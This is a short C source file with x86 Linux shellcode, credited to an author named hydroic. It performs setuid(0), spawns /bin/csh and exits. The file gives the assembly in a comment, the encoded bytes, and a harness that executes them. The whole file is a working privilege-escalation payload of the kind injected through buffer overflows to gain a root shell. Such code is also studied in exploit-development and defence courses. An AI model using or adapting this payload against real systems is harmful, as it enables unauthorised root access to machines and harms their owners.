/* 
 * Shellcode: setuid(0) + /bin/csh/ + exit(0)
 * Coded by hydroic
 * hydroic@yahoo.com
 * http://hydroic.tsx.org
 *
 * asm code:
 * 
 *	  xor  %eax,%eax
 *	  xor  %ebx,%ebx
 *	  mov  $0x17,%al
 *	  int  $0x80		setuid(0)
 *	  xor  %eax,%eax
 *	  push %eax
 *	  push $0x6873632F
 *	  push $0x6E69622F
 *	  mov  %esp,%ebx
 *	  push %eax
 *	  push %ebx
 *	  mov  %esp,%ecx
 *	  xor  %edx,%edx
 *	  mov  $0xb,%al
 *	  int  $0x80		/bin/csh
 *	  xor  %eax,%eax
 *	  xor  %ebx,%ebx
 *	  mov  $0x1,%al
 *	  int  $0x80		exit(0)
 */

#include <stdio.h>

 char shellcode[]="\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68"
	          "\x2f\x63\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50"
		  "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\x31"
		  "\xdb\xb0\x01\xcd\x80";

main(){

 long (*run) ();

  printf("Shellcode: %d bytes.\n", strlen(shellcode));
  run=shellcode;
  run();
}